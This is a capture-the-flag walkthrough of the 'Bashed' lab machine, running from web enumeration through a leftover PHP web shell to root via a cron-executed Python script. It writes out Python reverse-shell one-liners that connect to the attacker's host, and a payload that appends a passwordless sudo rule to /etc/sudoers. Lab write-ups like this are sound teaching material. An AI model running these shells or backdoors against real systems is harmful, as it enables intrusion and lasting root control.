BASHED

10.10.10.68

Recon

nmap-auto 10.10.10.68 all

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

The only port that's interesting it the http service, so that will be the starting point.

Enumeration

Since the only port is the http port, enumerating the webpage will probably provide an exploitation avenue. A quick look at the webpage, "Arrexel's Development Site" shows the following:

The first entry on the blog has the two following links:

• https://github.com/Arrexel/phpbash
• http://10.10.10.68/single.html

The single.html webpage is really peculiar because it shows an example of an interactive web shell running on "/uploads/phpbash.php". In fact, the creator of the website even goes as far to say "I actually developed it on this exact server!". Maybe it's still on it. At first glance, it doesn't exist in the "/uploads" folder like the screenshot shows, but maybe somewhere else.

Fuzzing possible directories can open secrets about the webpage. In this case, I will use [dirsearch.py](https://github.com/maurosoria/dirsearch). The following command searches for (1) txt files, (2) html files, (3) php files, and (4) sh files using a wordlist that contains many common directory names.

python3 dirsearch.py -e txt,html,php,sh -w /home/z3r0/Resources/wordlists/dir-list.txt -t 10 -u http://10.10.10.68/

• http://10.10.10.68/css/
• http://10.10.10.68/dev/
• http://10.10.10.68/fonts/
• http://10.10.10.68/images/
• http://10.10.10.68/js/
• http://10.10.10.68/php/
• http://10.10.10.68/uploads/

Sitting in the "/dev" folder is the PHP web shell made by the website creator. There is actually two that could be used: (1) http://10.10.10.68/dev/phpbash.php, and (2) http://10.10.10.68/dev/phpbash.min.php. Navigating to the first gives a PHP web shell owned by www-data. The following is a screenshot of the web shell with some of the first commands I usually type in a shell:

Exploitation

Typing the command sudo -l will list the allowed commands for the invoking user on the current host. The user www-data happens to be able to run all commands as the user scriptmanager with no password. The user www-data can also access both the users, arrexel and scriptmanager, home directories, one of which contains the following user flag:

user.txt: 2c281f318555dbc1b856957c7147bfc1

The web shell isn't persistent, so a reverse shell might be better. I tried a handful of reverse shells (bash, PHP, netcat), but the only one that worked was a Python reverse shell. After setting up a listener with netcat using the command rlwrap nc -nvlp 9000, the following python command can be used to catch a shell on the web shell:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.13",9000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

The result is the following reverse shell (use the command python -c 'import pty;pty.spawn("/bin/bash")' to get a tty shell):

Since this is a tty shell, it's possible to use the above noted sudo -l information to enter a shell as user scriptmanager.

sudo -u scriptmanager /bin/bash

Privilege Escalation

Looking through the directories starting from root, the unusual folder "/scripts" popped out. Entering it showed two files: (1) test.py and (2) test.txt. Even more interesting, writing the command ls -lisa test* showed that test.txt was created by root, so maybe when scriptmanager calls test.py, it causes root to run the script after.

To test it, create another listener with netcat using the command rlwrap nc -nvlp 9001, then edit the test.py file to send a reverse shell to a different port.

Original

test.py (original)

f = open("test.txt", "w")
f.write("testing 123!")
f.close

New

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.13",9001))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])

This can be changed using the echo command:

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.13",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' > test.py

Sure, enough waiting a small amount of time, the second listener receives a connection from root.

Entering the command ps aux to show the active processes in the root shell shows the process: root 1750 0.0 0.0 4508 796 ? Ss 16:30 0:00 /bin/sh -c cd /scripts; for f in *.py; do python "$f"; done. It seems that root has a cronjob to go into the "/scripts" folder and run any python file that exists in that folder as the root user. So really any script that gives a backdoor to accessing root would have worked, not just a reverse shell. To try that, maybe the following script to give user scriptmanager the ability to call all binaries with root privilege will work:

import os
os.system('echo "scriptmanager ALL=(ALL:ALL) NOPASSWD: ALL" >> /etc/sudoers')

After letting the cronjob run, running the command sudo su worked and gave root access! Cool, that means that there are a variety of scripts that can be run to get root. Last step is to collect the flag in the "/root" directory.

root.txt: cc4f0afe3a1026d402ba10329674a8e2